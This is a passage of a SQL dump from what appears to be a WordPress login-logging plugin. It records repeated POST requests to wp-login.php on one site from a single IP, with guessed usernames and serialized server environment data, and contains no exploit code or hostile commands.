04:14:48'),(95126,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828017.082171;s:12:\"REQUEST_TIME\";i:1746828017;}}','13.201.84.118',1,'2025-05-10 03:30:18','2025-05-11 04:14:48'),(95127,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828017.0802691;s:12:\"REQUEST_TIME\";i:1746828017;}}','13.201.84.118',1,'2025-05-10 03:30:18','2025-05-11 04:14:47'),(95128,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828017.0810859;s:12:\"REQUEST_TIME\";i:1746828017;}}','13.201.84.118',1,'2025-05-10 03:30:18','2025-05-11 04:14:47'),(95129,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828017.0788691;s:12:\"REQUEST_TIME\";i:1746828017;}}','13.201.84.118',1,'2025-05-10 03:30:18','2025-05-11 04:14:47'),(95130,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828271.910239;s:12:\"REQUEST_TIME\";i:1746828271;}}','13.201.84.118',1,'2025-05-10 03:34:33','2025-05-11 04:14:47'),(95131,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828271.9155891;s:12:\"REQUEST_TIME\";i:1746828271;}}','13.201.84.118',1,'2025-05-10 03:34:33','2025-05-11 04:14:48'),(95132,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828271.9135931;s:12:\"REQUEST_TIME\";i:1746828271;}}','13.201.84.118',1,'2025-05-10 03:34:33','2025-05-11 04:14:47'),(95133,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828271.9222119;s:12:\"REQUEST_TIME\";i:1746828271;}}','13.201.84.118',1,'2025-05-10 03:34:33','2025-05-11 04:14:47'),(95134,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828271.9621711;s:12:\"REQUEST_TIME\";i:1746828271;}}','13.201.84.118',1,'2025-05-10 03:34:33','2025-05-11 04:14:48'),(95135,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"125\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"125\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828529.9277439;s:12:\"REQUEST_TIME\";i:1746828529;}}','13.201.84.118',1,'2025-05-10 03:38:51','2025-05-11 04:14:47'),(95136,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"124\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"124\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOA